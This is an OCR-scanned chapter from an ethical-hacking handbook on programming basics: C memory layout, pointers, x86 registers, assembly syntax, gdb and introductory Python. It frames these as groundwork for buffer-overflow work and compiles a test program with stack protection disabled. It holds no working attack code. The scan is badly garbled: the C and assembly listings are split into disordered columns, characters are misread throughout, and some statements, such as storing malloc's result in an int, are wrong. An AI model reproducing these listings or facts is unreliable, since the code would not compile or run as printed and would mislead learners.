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Introduction to C Programming (Richard Mobbs) 
rj m 1 /c/index, html 



www.comp.nus.edu.sg/~hugh/ 
computer, howstuffworks .com/ 
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Computer Memory 

In the simplest terms, computer memory is an electronic mechanism that has the abil- 
ity to store and retrieve data. The smallest amount of data that can be stored is 1 bit, 
which can be represented by either a 1 or a 0 in memory. When you put 4 bits together, 
it is called a nibble, which can represent values from 0000 to -1111. There are exactly 16 
binary values, ranging from 0 to 15, in decimal format. When you put two nibbles, or 
8 bits, together, you get a byte, which can represent values from 0 to (2 8 - 1), or 0 to 255 
in decimal. When you put 2 bytes together, you get a word, which can represent values 
from 0 to (2 1S - 1), or 0 to 65,535 in decimal. Continuing to piece data together, if you 
put two words together, you get a double word, or DWORD, which can represent values 
from 0 to (2 32 - 1), or 0 to 4,294,967,295 in decimal. 

There are many types of computer memory; we will focus on random access mem- 
ory (RAM) and registers. Registers are special forms of memory embedded within pro- 
cessors, which will be discussed later in this chapter in the "Registers" section. 



Random Access Memory (RAM) 

In RAM, any piece of stored data can be retrieved at any time — thus the term "random 
access." However, RAM is volatile, meaning that when the computer is turned off, all 
data is lost from RAM. When discussing modern Intel-based products (x86), the mem- 
ory is 32-bit addressable, meaning that the address bus the processor uses to select a 
particular memory address is 32 bits wide. Therefore, the most memory that can be ad- 
dressed in an x86 processor is 4,294,967,295 bytes. 

Endian 

In his 1980 Internet Experiment Note (IEN) 137, "On Holy Wars and a Plea for Peace," 

Danny Cohen summarized Swift's Gulliver’s Travels, in part, as follows in his discussion 
of byte order: _ __ 
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Gulliver finds out that there is a law, proclaimed by the grandfather of the 
present ruler, requiring all citizens of Lilliput to break their eggs only at the 
little ends. Of course, all those citizens who broke their eggs at the big ends 
were angered by the proclamation. Civil war broke out between the Little- 
Endians and the Big-Endians, resulting in the Big-Endians taking refuge on 
a nearby island, the kingdom of Blefuscu. 

The point of Cohen's paper was to describe the two schools of thought when writ- 
ing data into memory. Some feel that the low-order bytes should be written first (called 
"Little-Endians" by Cohen), while others think the high-order bytes should be written 
first (called "Big-Endians"). The difference really depends on the hardware you are us- 
ing. For example, Intel-based processors use the little-endian method, whereas Motor- 
ola-based processors use big-endian. This will come into play later as we talk about 
shellcode in Chapters 13 and 14. 

Segmentation of Memory 

The subject of segmentation could easily consume a chapter itself. However, the basic 
concept is simple. Each process (oversimplified as an executing program) needs to have 
access to its own areas in memory. After all, you would not want one process overwrit- 
ing another process's data. So memory is broken down into small segments and hand- 
ed out to processes as needed. Registers, discussed later in the chapter, are used to store 
and keep track of the current segments a process maintains. Offset registers are used to 
keep track of where in the segment the critical pieces of data are kept. 

Programs in Memory 

When processes are loaded into memory, they are basically broken into many small 
sections. There are six main sections that we are concerned with, and we'll discuss them 
in the following sections. 

.text Section 

The .text section basically corresponds to the .text portion of the binary executable file. 
It contains the machine instructions to get the task done. This section is marked as read- 
only and will cause a segmentation fault if written to. The size is fixed at runtime when 
the process is first loaded. 

.data Section 

The .data section is used to store global initialized variables, such as: 

int a = 0; 

The size of this section is fixed at runtime. 

.bss Section 

The below stack section (.bss) is used to store global noninitialized variables, such as: 

int a; 



The size of this section is fixed at runtime. 
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Heap Section 

The heap section is used to store dynamically allocated variables and grows from the 
lower-addressed memory to the higher-addressed memory. The allocation of memory 
is controlled through the malloc() and freeQ functions. For example, to declare an 
integer and have the memory allocated at runtime, you would use something like: 

int i = malloc (sizeof (int) ) ; //dynamically allocates an integer, contains 

//the pre-existing value of that memory 



Stack Section 

The stack section is used to keep track of function calls (recursively) and grows from the 
higher-addressed memory to the lower-addressed memory on most systems. As we will 
see, the fact that the stack grows in this manner allows the subject of buffer overflows to 
exist. Local variables exist in the stack section. 

Environment/Arguments Section 

The environment/ arguments section is used to store a copy of system-level variables 
that may be required by the process during runtime. For example, among other things, 
the path, shell name, and hostname are made available to the running process. This 
section is writable, allowing its use in format string and buffer overflow exploits. Ad- 
ditionally, the command-line arguments are stored in this area. The sections of memo- 
ry reside in the order presented. The memory space of a process looks like this: 



Lower addresses Higher addresses 



.text 


.data 


.bss 


tieap ^ nusc ^J> Stack 


Env. 



Buffers 

The term buffer refers to a storage place used to receive and hold data until it can be 
handled by a process. Since each process can have its own set of buffers, it is critical to 
keep them straight. This is done by allocating the memory within the .data or .bss sec- 
tion of the process's memory. Remember, once allocated, the buffer is of fixed length. 
The buffer may hold any predefined type of data; however, for our purpose, we will 
focus on string-based buffers, used to store user input and variables. 

Strings in Memory 

Simply put, strings are just continuous arrays of character data in memory. The string is 
referenced in memory by the address of the first character. The string is terminated or 
ended by a null character (\0 in C). 

Pointers 

Pointers are special pieces of memory that hold the address of other pieces of memory. 
Moving data around inside of memory is a relatively slow operation. It turns out that 
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instead of moving data, it is much easier to keep track of the location of items in mem- 
ory through pointers and simply change the pointers. Pointers are saved in 4 bytes of 
contiguous memory because memory addresses are 32 bits in length (4 bytes). For ex- 
ample, as mentioned, strings are referenced by the address of the first character in the 
array. That address value is called a pointer. So the variable declaration of a string in C 
is written as follows: 

char * str; //this is read, give me 4 bytes called str which is a pointer 
//to a Character variable (the first byte of the array) . 

It is important to note that even though the size of the pointer is set at 4 bytes, the 
size of the string has not been set with the preceding command; therefore, this data is 
considered uninitialized and will be placed in the .bss section of the process memory. 

As another example, if you wanted to store a pointer to an integer in memory, you 
would issue the following command in your C program: 

int * pointl; // this is read, give me 4 bytes called pointl which is a 
//pointer to an integer variable. 

To read the value of the memory address pointed to by the pointer, you dereference 
the pointer with the * symbol. Therefore, if you wanted to print the value of the integer 
pointed to by pointl in the preceding code, you would use the following command: 

printf("%d", *pointl) ; 

where the * is used to dereference the pointer called pointl and display the value of the 
integer using the printfQ function. 



Putting the Pieces of Memory Together 

Now that you have the basics down, we will present a simple example to illustrate the 
usage of memory in a program: 



/* memory. c */ 
int index = 5; 
char * str; 
int nothing; 
void functl (int 
int i=c; 
str = (char*) 

strncpy(str, " 

} 

void main ( ) { 
functl ( 1 ) ; 

} 



// this comment simply holds the program name 
// integer stored in data (initialized) 

// string stored in bss (uninitialized) 

// integer stored in bss (uninitialized) 
c) { // bracket starts functionl block 

// stored in the stack region 
malloc (10 * sizeof (char)); // Reserves 10 characters in 

// the heap region */ 

'abcde", 5); //copies 5 characters "abcde" into str 
//end of functionl 

//the required main function 
//main calls functionl with an argument 
//end of the main function 



This program does not do much. First, several pieces of memory are allocated in 
different sections of the process memory. When main is executed, functl () is called 
with an argument of 1. Once functl () is called, the argument is passed to the function 
variable called c. Next, memory is allocated on the heap for a 10-byte string called str. 
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Finally, the 5-byte string "abcde" is copied into the new variable called str. The function 
ends, and then the main() program ends. 




CAUTION You must have a good grasp of this material before moving on in 
the book. If you need to review any part of this chapter, please do so before 
continuing. 



References 

Endianness en.wikipedia.org/wiki/Endianness 

"Pointers: Understanding Memory Addresses" (Marshall Brain) 

computer, howstuffworks.com/c2 3 . htm 
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"Smashing the Stack for Fun and Profit" (Aleph One) www.phrack.org/ 
issues. html?issue=49&id=l 4#article 



Intel Processors 

There are several commonly used computer architectures. In this chapter, we will focus 
on the Intel family of processors or architecture. 

The term architecture simply refers to the way a particular manufacturer implement- 
ed its processor. Since the bulk of the processors in use today are Intel 80x86, we will 
further focus on that architecture. 



Registers 

Registers are used to store data temporarily. Think of them as fast 8- to 32-bit chunks of 
memory for use internally by the processor. Registers can be divided into four categories 
(32 bits each unless otherwise noted). These are listed and described in Table 10-4. 

References 

"A CPU History" (David Risley) www.pcmech.com/article/a-cpu-history 

x86 Registers www.eecg.toronto.edu/~amza/www.mindsec.com/files/x86regs.html 



Assembly Language Basics 

Though entire books have been written about the ASM language, there are a few basics 
you can easily grasp to become a more effective ethical hacker. 
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Register 

Category 


Register Name 


Purpose 


General registers 


EAX, EBX, ECX, EDX 


Used to manipulate data 




AX, BX, CX, DX 


16-bit versions of the preceding entry 




AH, BH, CH, DH,AL, BL, CL, DL 


8-bit high- and low-order bytes of the 
previous entry 


Segment registers 


CS, SS, DS, ES, FS, GS 


1 6-bit, holds the first part of a 
memory address; holds pointers to 
code, stack, and extra data segments 


Offset registers 




Indicates an offset related to segment 
registers 




EBP (extended base pointer) 


Points to the beginning of the local 
environment for a function 




ESI (extended source index) 


Holds the data source offset in an 
operation using a memory block 




EDI (extended destination index) 


Holds the destination data offset in an 
operation using a memory block 




ESP (extended stack pointer) 


Points to the top of the stack 


Special registers 




Only used by the CPU 




EFLAGS register; key flags to know 
are ZF=zero flag; IF=lnterrupt 
enable flag; SF=sign flag 


Used by the CPU to track results of 
logic and the state of processor 




EIP (extended instruction 
pointer) 


Points to the address of the next 
instruction to be executed 



Table 10-4 Categories of Registers 



Machine vs. Assembly vs. C 

Computers only understand machine language — that is, a pattern of Is and Os. Hu- 
mans, on the other hand, have trouble interpreting large strings of Is and Os, so assem- 
bly was designed to assist programmers with mnemonics to remember the series of 
numbers. Later, higher-level languages were designed, such as C and others, which re- 
move humans even further from the Is and Os. If you want to become a good ethical 
hacker, you must resist societal trends and get back to basics with assembly. 

AT&T vs. NASM 

There are two main forms of assembly syntax: AT&T and Intel. AT&T syntax is used by 
the GNU Assembler (gas), contained in the gcc compiler suite, and is often used by 
Linux developers. Of the Intel syntax assemblers, the Netwide Assembler (NASM) is the 
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most commonly used. The NASM format is used by many windows assemblers and 
debuggers. The two formats yield exactly the same machine language; however, there 
are a few differences in style and format: 

• The source and destination operands are reversed, and different symbols are 
used to mark the beginning of a comment: 

• NASM format: CMD <dest>, <source> <; comment> 

• AT&T format: CMD <source>, <dest> <# comment> 

• AT&T format uses a % before registers; NASM does not. 

• AT&T format uses a $ before literal values; NASM does not. 

• AT&T handles memory references differently than NASM. 

In this section, we will show the syntax and examples in NASM format for each 
command. Additionally, we will show an example of the same command in AT&T for- 
mat for comparison. In general, the following format is used for all commands: 

Coptional label :> <mnemonic> <operands> Coptional comments> 

The number of operands (arguments) depend on the command (mnemonic). 
Although there are many assembly instructions, you only need to master a few. These 
are described in the following sections. 

mov 

The mov command is used to copy data from the source to the destination. The value 
is not removed from the source location. 



NASM Syntax NASM Example AT&T Example 

mov <dest>, <source> mov eax, 5 1 h ;comment movl $5 1 h, %eax #comment 

Data cannot be moved directly from memory to a segment register. Instead, you 
must use a general-purpose register as an intermediate step; for example: 

mov eax, 1234h ; store the value 1234 (hex) into EAX 

mov cs, ax ; then copy the value of AX into CS . 

add and sub 

The add command is used to add the source to the destination and store the result in 
the destination. The sub command is used to subtract the source from the destination 
and store the result in the destination. 



NASM Syntax NASM Example AT&T Example 

add <dest>, <source> add eax, 5 1 h addl $5 1 h, %eax 

sub <dest>, <source> sub eax, 51 h subl $5 1 h, %eax 
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push and pop 

The push and pop commands are used to push and pop items from the stack. 



NASM Syntax NASM Example AT&T Example 

push <value> push eax pushl %eax 

pop <dest> pop eax popl %eax 



xor 

The xor command is used to conduct a bitwise logical "exclusive or" (XOR) function — 
for example, 11111111 XOR 11111111 = 00000000. Therefore, XOR value, value can be 
used to zero out or clear a register or memory location. 

NASM Syntax NASM Example AT&T Example 

xor <dest>, <source> xor eax, eax xor %eax, %eax 

jne, je, jz, jnz, and jmp 

The jne, je, jz, jnz, and jmp commands are used to branch the flow of the program to 
another location based on the value of the eflag "zero flag." jne/jnz will jump if the 
"zero flag" = 0; je/jz will jump if the "zero flag" = 1; and jmp will always jump. 

NASM Syntax NASM Example AT&T Example 

jnz <dest> / jne <dest> jne start jne start 

jz <dest> /je <dest> jz loop jz loop 

jmp <dest> jmp end jmp end 



call and ret 

The call command is used to call a procedure (not jump to a label). The ret command 
is used at the end of a procedure to return the flow to the command after the call. 



NASM Syntax 

call <dest> 
ret 



NASM Example 

call subroutine I 
ret 



AT&T Example 

call subroutine! 
ret 



inc and dec 

The inc and dec commands are used to increment or decrement the destination. 

NASM Example 

inc eax 
dec eax 



NASM Syntax 

inc <dest> 
dec <dest> 



AT&T Example 

incl %eax 
decl %eax 
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lea 

The lea command is used to load the effective address of the source into the desti- 
nation. 

NASM Syntax NASM Example AT&T Example 

lea <dest>, <source> lea eax, [dsi +4] leal 4(%dsi), %eax 



int 

The int command is used to throw a system interrupt signal to the processor. The 
common interrupt you will use is 0x80, which is used to signal a system call to the 
kernel. 



NASM Syntax NASM Example AT&T Example 

int <val> int 0x80 int $0x80 



Addressing Modes 

In assembly, several methods can be used to accomplish the same thing. In particular, 
there are many ways to indicate the effective address to manipulate in memory. These 
options are called addressing modes and are summarized in Table 10-5. 



Addressing Mode 


Description 


NASM Examples 


Register 


Registers hold the data to be manipulated. No 
memory interaction. Both registers must be the 
same size. 


mov ebx, edx 
add al, ch 


Immediate 


The source operand is a numerical value. 
Decimal is assumed; use h for hex. 


mov eax, 1 234h 
mov dx, 30 1 


Direct 


The first operand is the address of memory to 
manipulate. It’s marked with brackets. 


mov bh, 1 00 
mov[432 1 h], bh 


Register Indirect 


The first operand is a register in brackets that 
holds the address to be manipulated. 


mov [di], ecx 


Based Relative 


The effective address to be manipulated is 
calculated by using ebx or ebp plus an offset 
value. 


mov edx, 20[ebx] 


Indexed Relative 


Same as Based Relative, but edi and esi are 
used to hold the offset. 


mov ecx,20[esi] 


Based Indexed- 
Relative 


The effective address is found by combining 
Based and Indexed Relative modes. 


mov ax, [bx][si]+ 1 



Table 10-5 Addressing Modes 



https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 











Chapter 10: Programming Survival Skills 

189 



Assembly File Structure 

An assembly source file is broken into the following sections: 



• .model The .model directive is used to indicate the size of the .data and .text 
sections. 

• .stack The .stack directive marks the beginning of the stack section and is 
used to indicate the size of the stack in bytes. 

• .data The .data directive marks the beginning of the data section and is used 
to define the variables, both initialized and uninitialized. 

• .text The .text directive is used to hold the program's commands. 



For example, the following assembly program prints "Hello, haxor! " to the screen: 



section . 


. data 


msg db ' 


'Hello, haxo 


len equ 


$ - msg 


section . 


. text 


global start 


start : 


mov 


edx, len 


mov 


ecx,msg 


mov 


ebx, 1 


mov 


eax, 4 


int 


0x80 


mov 


ebx, 0 


mov 


eax, 1 


int 


0x80 



/section declaration 

:!",0xa ;our string with a carriage return 
/length of our string, $ means here 
/mandatory section declaration 
/export the entry point to the ELF linker or 
/loaders conventionally recognize 
/ _start as their entry point 



/now, write our string to stdout 

/notice how arguments are loaded in reverse 

/third argument (message length) 

/second argument (pointer to message to write) 
/load first argument (file handle (stdout)) 
/system call number ( 4=sys_write) 

/call kernel interrupt and exit 

/load first syscall argument (exit code) 

/system call number (l=sys_exit) 

/call kernel interrupt and exit 



Assembling 

The first step in assembling is to make the object code: 

$ nasm -f elf hello. asm 

Next, you invoke the linker to make the executable: 

$ Id -s -o hello hello. o 

Finally, you can ran the executable: 

$ ./hello 
Hello, haxor! 



References 

Art of Assembly Language Programming and HLA (Randall Hyde) 

webster.cs.ucr.edu/ 

Notes on x86 assembly (Phil Bowman) www.ccntech.com/code/x86asm.txt 
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Debugging with gdb 

When programming with C on Unix systems, the debugger of choice is gdb. It provides 
a robust command-line interface, allowing you to run a program while maintaining full 
control. For example, you may set breakpoints in the execution of the program and 
monitor the contents of memory or registers at any point you like. For this reason, 
debuggers like gdb are invaluable to programmers and hackers alike. 



gdb Basics 

Commonly used commands in gdb are listed and described in Table 10-6. 

To debug our example program, we issue the following commands. The first will 
recompile with debugging and other useful options (refer to Table 10-3). 

$gcc -ggdb -mpreferred-stack-boundary=2 -f no-stack-protector -o meet meet.c 

$gdb -q meet 

(gdb) run Mr Haxor 

Starting program: /home/aaharper /book/meet Mr Haxor 
Hello Mr Haxor 
Bye Mr Haxor 

Program exited with code 015. 

(gdb) b main 

Breakpoint 1 at 0x8048393: file meet.c, line 9. 

(gdb) run Mr Haxor 

Starting program: /home/aaharper /book/meet Mr Haxor 

Breakpoint 1, main (argc=3, argv=0xbf f f fbe4 ) at meet.c: 9 

9 greeting (argv [1] , argv [2] ) ; 

(gdb) n 

Hello Mr Haxor 

10 printf("Bye %s %s\n", argv[l], argv[2]); 

(gdb) n 

Bye Mr Haxor 

11 } 

(gdb) p argv[l] 

$1 = Oxbf f f fd06 "Mr" 

(gdb) p argv [2] 

$2 = 0xbffffd09 "Haxor" 

(gdb) p argc 
$3 = 3 
(gdb) info b 

Num Type Disp Enb Address What 

1 breakpoint keep y 0x08048393 in main at meet.c: 9 

breakpoint already hit 1 time 
(gdb) info reg 
eax Oxd 13 

ecx 0x0 0 

edx Oxd 13 

...truncated for brevity... 

(gdb) quit 

A debugging session is active. 

Do you still want to close the debugger? (y or n) y 
$ 
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Command 


Description 


b <function> 


Sets a breakpoint at function 


b *mem 


Sets a breakpoint at absolute memory location 


info b 


Displays information about breakpoints 


delete b 


Removes a breakpoint 


run <args> 


Starts debugging program from within gdb with given arguments 


info reg 


Displays information about the current register state 


stepi or si 


Executes one machine instruction 


next or n 


Executes one function 


bt 


Backtrace command, which shows the names of stack frames 


up/down 


Moves up and down the stack frames 


print var 


Prints the value of the variable; 


print lx $<reg> 


Prints the value of a register 


xINTA 


Examines memory, where N = number of units to display; T = type of data to 
display (x:hex, d:dec, c:char, s:string, i:instruction); A = absolute address or 
symbolic name such as “main” 


quit 


Exit gdb 



Table 10-6 Common gdb Commands 



Disassembly with gdb 

To conduct disassembly with gdb, you need the two following commands: 

set disassembly-flavor <intel/att> 
disassemble <function name> 



The first command toggles back and forth between Intel (NASM) and AT&T format. 
By default, gdb uses AT&T format. The second command disassembles the given func- 
tion (to include main if given). For example, to disassemble the function called greet- 
ing in both formats, you would type 



$gdb -q meet 

(gdb) disassemble greeting 

Dump of assembler code for function greeting: 



0x804835c <greeting>: push 

0x804835d <greeting+l> : mov 
0x804835f <greeting+3> : sub 
0x8048365 <greeting+9> : pushl 
0x8048368 <greeting+12> : 
0x804836e <greeting+18> : 
0x804836f <greeting+l 9> : 
0x8048374 <greeting+24> : 
0x8048377 <greeting+27> : 
0x804837d <greeting+33> : 
0x804837e <greeting+34> : 



%ebp 

%esp, %ebp 
$0x190, %esp 
Oxc (%ebp) 

lea Oxf f f f fe70 (%ebp) , %eax 

push %eax 

call 0x804829c <strcpy> 

add $0x8,%esp 

lea Oxf f f f fe70 (%ebp) , %eax 

push %eax 

pushl 0x8 (%ebp) 
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0x8048381 <greeting+37> : 


push 


$0x8048418 


0x8048386 <greeting+42> : 


call 


0x804828c <printf> 


0x804838b <greeting+47> : 


add 


$0xc, %esp 


0x804838e <greeting+50> : 


leave 




0x804838f <greeting+51> : 


ret 




End of assembler dump. 

(gdb) set disassembly-flavor 


intel 




(gdb) disassemble greeting 

Dump of assembler code for function greeting: 


0x804835c <greeting>: push 


ebp 




0x804835d <greeting+l> : mov 


ebp, esp 




0x804835f <greeting+3> : sub 


esp, 0x190 



...truncated for brevity... 

End of assembler dump. 

(gdb) quit 
$ 

References 

Debugging with NASM and gdb www.csee.umbc.edu/help/nasm/nasm.shtml 
"Smashing the Stack for Fun and Profit" (Aleph One) 
www.phrack.org/issues.html?issue=49&id=14#article 

Python Survival Skills 

Python is a popular interpreted, object-oriented programming language similar to Perl. 
Hacking tools (and many other applications) use Python because it is a breeze to learn 
and use, is quite powerful, and has a clear syntax that makes it easy to read. This intro- 
duction covers only the bare minimum you'll need to understand. You'll almost surely 
want to know more, and for that you can check out one of the many good books dedi- 
cated to Python or the extensive documentation at www.python.org. 



Getting Python 

We're going to blow past the usual architecture diagrams and design goals spiel and 
tell you to just go download the Python version for your OS from www.python.org/ 
download/ so you can follow along here. Alternately, try just launching it by typing 
python at your command prompt — it comes installed by default on many Linux distri- 
butions and Mac OS X 10.3 and later. 




NOTE For you Mac OS X users, Apple does not include Python’s IDLE user 
interface that is handy for Python development. You can grab that from www 
.python.org/download/mac/. Or you can choose to edit and launch Python 
from Xcode, Apple’s development environment, by following the instructions 
at http://pythonmac.org/wiki/Xcodelntegration. 



Because Python is interpreted (not compiled), you can get immediate feedback 
from Python using its interactive prompt. We'll be using it for the next few pages, so 
you should start the interactive prompt now by typing python. 
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Hello World in Python 

Every language introduction must start with the obligatory "Hello, world" example and 
here is Python's: 



% python 

. . . (three lines of text deleted here and in subsequent examples) . . . 
>>> print 'Hello world' 

Hello world 



Or if you prefer your examples in file form: 

% cat > hello. py 
print 'Hello, world' 

A D 

% python hello. py 
Hello, world 

Pretty straightforward, eh? With that out of the way, let's roll into the language. 

Python Objects 

The main thing you need to understand really well is the different types of objects that 
Python can use to hold data and how it manipulates that data. We'll cover the big five 
data types: strings, numbers, lists, dictionaries (similar to lists), and files. After that, 
we'll cover some basic syntax and the bare minimum on networking. 



Strings 

You already used one string object in the prior section, "Hello, world". Strings are used 
in Python to hold text. The best way to show how easy it is to use and manipulate 
strings is by demonstration: 

% python 

»> stringl = 'Dilbert' 

>» string2 = 'Dogbert' 

>>> stringl + string2 
' DilbertDogbert ' 

>>> stringl + " Asok " + string2 
'Dilbert Asok Dogbert' 

>>> string3 = stringl + string2 + "Wally" 

>>> string3 
' DilbertDogbertWally ' 

>>> string3 [2 : 10 ] # string 3 from index 2 (0-based) to 10 

' IbertDog ' 

»> string3[0] 

' D' 

>>> len(string3) 

19 

>>> string3[14:] # string3 from index 14 (0-based) to end 
' Wally ' 

»> string3[-5:] # Start 5 from the end and print the rest 
' Wally ' 



PART III 



Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

194 



>>> string3 . find (' Wally ' ) # index (0-based) where string starts 

14 

»> string3 . find (' Alice ' ) # -1 if not found 

-1 

>>> string3 . replace (' Dogbert ',' Alice ' ) # Replace Dogbert with Alice 

' DilbertAliceWally ' 

»> print ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' # 30 A's the hard way 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
»> print 'A' *30 # 30 A's the easy way 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

Those are basic string-manipulation functions you'll use for working with simple 
strings. The syntax is simple and straightforward, just as you'll come to expect from 
Python. One important distinction to make right away is that each of those strings (we 
named them stringl, string2, and string3) is simply a pointer — for those familiar with 
C — or a label for a blob of data out in memory someplace. One concept that sometimes 
trips up new programmers is the idea of one label (or pointer) pointing to another la- 
bel. The following code and Figure 10-1 demonstrate this concept: 

»> labell = 'Dilbert' 

»> label2 = labell 

At this point, we have a blob of memory somewhere with the Python string 'Dilbert' 
stored. We also have two labels pointing at that blob of memory. 

If we then change label l's assignment, label2 does not change: 

. . . continued from above 
»> labell = 'Dogbert' 

>>> label2 
' Dilbert ' 

As you see in Figure 10-2, label2 is not pointing to labell, per se. Rather, it's point- 
ing to the same thing labell was pointing to until labell was reassigned. 



Figure 10-1 

Two labels pointing 


points to 

labell 

points to 


— ► 


‘Dilbert’ 


at the same string 
in memory 


laoeiz 




Python string object 
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Figure 1 0-2 

Label I is reassigned 
to point to a 
different string. 




Numbers 

Similar to Python strings, numbers point to an object that can contain any kind of 
number. It will hold small numbers, big numbers, complex numbers, negative num- 
bers, and any other kind of number you could dream up. The syntax is just as you'd 
expect: 

>>> nl=5 # Create a Number object with value 5 and label it nl 
»> n2=3 
>>> nl * n2 
15 

>>> nl ** n2 # nl to the power of n2 (5*3) 

125 

>>> 5/3, 5/3.0, 5%3 # Divide 5 by 3, then 3.0, then 5 modulus 3 

(1, 1.6666666666666667, 2) 

»> n3 = 1 # n3 = 0001 (binary) 

>>> n3 << 3 # Shift left three times: 1000 binary = 8 

8 

>>> 5+3*2 # The order of operations is correct 

11 

Now that you've seen how numbers work, we can start combining objects. What 
happens when we evaluate a string plus a number? 

>>> si = 'abc 1 
»> nl = 12 
>>> si + nl 

Traceback (most recent call last) : 

File "<stdin>", line 1, in ? 

TypeError: cannot concatenate 'str' and 'int' objects 

Error! We need to help Python understand what we want to happen. In this case, 
the only way to combine 'abc' and 12 would be to turn 12 into a string. We can do that 
on-the-fly: 

>>> si + str (nl ) 

1 abcl2 ' 

>>> si . replace (' c ', str (nl ) ) 

' abl2 ' 
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When it makes sense, different types can be used together: 

>>> sl*nl # Display ' abc' 12 times 
' abcabcabcabcabcabcabcabcabcabcabcabc ' 

And one more note about objects — simply operating on an object often does not 
change the object. The object itself (number, string, or otherwise) is usually changed 
only when you explicitly set the object's label (or pointer) to the new value, as follows: 

>>> r. 5 
»> nl ** 2 
25 

»> nl 
5 

»> nl = nl ** 2 
»> nl 
25 



Lists 

The next type of built-in object we'll cover is the list. You can throw any kind of object 
into a list. Lists are usually created by adding [ and ] around an object or a group of 
objects. You can do the same kind of clever "slicing" as with strings. Slicing refers to our 
string example of returning only a subset of the object's values, for example, from the 
fifth value to the tenth with labell[5:10]. Let's demonstrate how the list type works: 

>>> mylist = [1,2,3] 

>>> len (mylist) 

3 

>>> mylist*4 # Display mylist, mylist, mylist, mylist 

[1, 2, 3, 1, 2, 3, 1, 2, 3, 1, 2, 3] 

>>> 1 in mylist # Check for existence of an object 

True 

>>> 4 in mylist 
False 

>>> mylist [1:] # Return slice of list from index 1 and on 

[2, 3] 

»> biglist = [['Dilbert 1 , 'Dogbert', 'Catbert'], 

... ['Wally', 'Alice', 'Asok']] # Set up a two-dimensional list 

»> biglist [1] [0] 

' Wally ' 

»> biglist [0] [2] 

' Catbert ' 

»> biglist [1] = 'Ratbert' # Replace the second row with 'Ratbert' 

>>> biglist 

[['Dilbert', 'Dogbert', 'Catbert'], 'Ratbert'] 

»> stacklist = biglist [0] # Set another list = to the first row 

»> stacklist 

['Dilbert', 'Dogbert', 'Catbert'] 

>>> stacklist = stacklist + ['The Boss'] 

»> stacklist 

['Dilbert', 'Dogbert', 'Catbert', 'The Boss'] 

>>> stacklist . pop ( ) # Return and remove the last element 

'The Boss' 



# Display value of 5 A 2 

# nl, however is still set to 5 

# Set nl = 5 A 2 

# Now nl is set to 25 
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»> stacklist .pop ( ) 

' Catbert ' 

»> stacklist .pop ( ) 

' Dogbert ' 

»> stacklist 
[ ' Dilbert ' ] 

>>> stacklist . extend ([' Alice ' , 'Carol', 'Tina']) 

»> stacklist 

['Dilbert', 'Alice', 'Carol', 'Tina'] 

»> stacklist . reverse ( ) 

>>> stacklist 

['Tina', 'Carol', 'Alice', 'Dilbert'] 

>>> del stacklist [1] # Remove the element at index 1 

»> stacklist 

['Tina', 'Alice', 'Dilbert'] 

Next, we'll take a quick look at dictionaries, then files, and then we'll put all the 
elements together. 

Dictionaries 

Dictionaries are similar to lists except that objects stored in a dictionary are referenced 
by a key, not by the index of the object. This turns out to be a very convenient mecha- 
nism to store and retrieve data. Dictionaries are created by adding { and } around a 
key-value pair, like this: 

>>> d = ( 'hero 1 : 'Dilbert' } 

>>> d [ ' hero ' ] 

' Dilbert ' 

>>> 'hero' in d 
True 

>>> 'Dilbert' in d # Dictionaries are indexed by key, not value 

False 

»> d.keysO # keys ( ) returns a list of all objects used as keys 

[ ' hero ' ] 

»> d. values () # values () returns a list of all objects used as values 

[ ' Dilbert ' ] 

>>> d['hero'] = 'Dogbert' 

»> d 

{ ' hero ' : ' Dogbert ' } 

»> d[ 'buddy'] = 'Wally' 

»> d[ ’pets'] =2 # You can store any type of object, not just strings 

»> d 

{'hero': 'Dogbert', 'buddy': 'Wally', 'pets': 2} 

We'll use dictionaries more in the next section as well. Dictionaries are a great way 
to store any values that you can associate with a key where the key is a more useful way 
to fetch the value than a list's index. 



Files with Python 

File access is as easy as the rest of Python's language. Files can be opened (for reading 
or for writing), written to, read from, and closed. Let's put together an example using 
several different data types discussed here, including files. This example assumes we 
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start with a file named targets and transfer the file contents into individual vulnerabil- 
ity target files. (We can hear you saying, "Finally, an end to the Dilbert examples!") 

% cat targets 

RPC-DCOM 10.10.20.1,10.10.20.4 

SQL-SA-blank-pw 10.10.20.27,10.10.20.28 

# We want to move the contents of targets into two separate files 
% python 

# First, open the file for reading 
»> targets_file = open (' targets r ' ) 

# Read the contents into a list of strings 
>>> lines = targets_file . readlines ( ) 

>>> lines 

[ ' RPC-DCOM\tlO .10. 20. 1,10. 10. 20. 4\n' , ' SQL-SA-blank-pw\ 

t.: o. : 0.20.2 /, : o. : o.2o.2:s\n ' ; 

# Let's organize this into a dictionary 
>>> lines_dictionary = { } 

>>> for line in lines: # Notice the trailing : to start a loop 

... one_line = line. split () # split () will separate on white space 

... line_key = one_line[0] 

... line_value = one_line[l] 

... lines_dictionary [ line_key ] = line_value 

... # Note: Next line is blank (<CR> only) to break out of the for loop 

>>> # Now we are back at python prompt with a populated dictionary 
>>> lines_dictionary 

{'RPC-DCOM': '10.10.20.1,10.10.20.4', 'SQL-SA-blank-pw': 

'10.10.20.27,10.10.20.28' } 

# Loop next over the keys and open a new file for each key 
>>> for key in lines_dictionary . keys ( ) : 

... targets_string = lines_dictionary [ key ] # value for key 

... targets_list = targets_string . split (',' ) # break into list 

... targets_number = len (targets_list) 

... filename = key + '_' + str (targets_number ) + '_targets' 

... vuln_file = open ( filename, ' w ' ) 

... for vuln_target in targets_list : # for each IP in list... 

... vuln_file . write (vuln_target + ' \ n ' ) 

... vuln_file . close ( ) 

»> A D 
% Is 

RPC-DCOM_2_targets targets 

SQL-SA-blank-pw_2_targets 
% cat SQL-SA-blank-pw_2_targets 

10.10.20.27 

10.10.20.28 

% cat RPC-DCOM_2_targets 
10.10.20.1 
10.10.20.4 

This example introduced a couple of new concepts. First, you now see how easy it is 
to use files. open() takes two arguments. The first is the name of the file you'd like to 
read or create, and the second is the access type. You can open the file for reading (r) or 
writing (w). 
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And you now have a for loop sample. The structure of a for loop is as follows: 

for <iterator-value> in <list-to-iterate-over> : 

# Notice the colon on end of previous line 

# Notice the tab-in 

# Do stuff for each value in the list 




CAUTION In Python, white space matters, and indentation is used to mark 
code blocks. 



Un-indenting one level or a carriage return on a blank line closes the loop. No need 
for C-style curly brackets, if statements and while loops are similarly structured. For 
example: 

if foo > 3: 

print 'Foo greater than 3' 
elif foo == 3: 

print 'Foo equals 3' 

else 

